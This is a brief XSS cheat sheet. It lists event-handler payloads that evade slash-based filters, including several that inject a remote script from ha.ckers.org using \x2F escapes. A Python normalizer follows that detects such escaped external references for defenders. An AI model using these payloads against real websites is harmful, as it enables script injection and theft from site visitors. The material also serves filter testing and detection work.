Post discovery
- Load a new URL in browser window without forward slash
<body onload=window.location='https:youtube.com'>
- Load a local js file from same folder without forward slash
<body onload=document.getElementsByTagName('head')[0].appendChild(document.createElement('script')).setAttribute('src','test.js')>
<body onload=document.head.appendChild(document.createElement('script')).setAttribute('src','test.js')>
- Load a remote js file from web without forward slash
<input type="image" src="a" onerror=document.getElementsByTagName('head')[0].appendChild(document.createElement('script')).setAttribute("src","http:\x2F\x2Fha.ckers.org\x2Fxss.js")>
\x2F is a JavaScript hex escape: the JS engine decodes it to / when it evaluates the string literal, after the HTML has already been parsed, so the slash never appears in the page source that a filter inspects.
<body onload=document.head.appendChild(document.createElement('script')).setAttribute('src','http:\x2F\x2Fha.ckers.org\x2Fxss.js')>
<input type="image" src="a" onerror=document.getElementsByTagName('head')[0].appendChild(document.createElement('script')).setAttribute("src","http://ha.ckers.org/xss.js")>
document.write(document.getElementsByTagName('noscript')[0].innerHTML); // pull data from any tag
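A defender-side normalizer, added here as an example and not part of the original post: it decodes the JavaScript \xHH and \uHHHH string escapes and recognizes the scheme-without-slashes URL form from the payloads above, so a filter or log rule keyed only on a literal / is not bypassed. The function names and the sample strings are constructed for this example.

```python
import re

# JavaScript string-literal escapes that a filter looking for a literal "/"
# never sees: \x2F (hex) and \u002F (unicode) both become "/" only when the
# JS engine evaluates the string, after the HTML has already been parsed.
_JS_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")
_JS_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Scheme followed by a host, with or without the "//" (the "https:youtube.com"
# form from the payloads above).
_SCHEME_HOST = re.compile(r"\b(?:https?|ftp):(?://)?[\w.-]+\.[a-z]{2,}", re.I)


def decode_js_escapes(value):
    """Apply the \\xHH and \\uHHHH decoding a JS engine performs on string literals."""
    value = _JS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), value)
    return _JS_HEX.sub(lambda m: chr(int(m.group(1), 16)), value)


def find_external_refs(value):
    """Return scheme:host references found after escape normalization."""
    return _SCHEME_HOST.findall(decode_js_escapes(value))


def scan_attribute_values(values):
    """Return (original, decoded, refs) for every value that references an external host."""
    hits = []
    for raw in values:
        refs = find_external_refs(raw)
        if refs:
            hits.append((raw, decode_js_escapes(raw), refs))
    return hits


# Constructed samples: the event-handler values from the post plus a local (benign) one.
SAMPLES = [
    r"window.location='https:youtube.com'",
    r"document.head.appendChild(document.createElement('script')).setAttribute('src','test.js')",
    r"document.head.appendChild(document.createElement('script')).setAttribute('src','http:\x2F\x2Fha.ckers.org\x2Fxss.js')",
]

if __name__ == "__main__":
    for raw, decoded, refs in scan_attribute_values(SAMPLES):
        print(f"{refs} <- {decoded}")
```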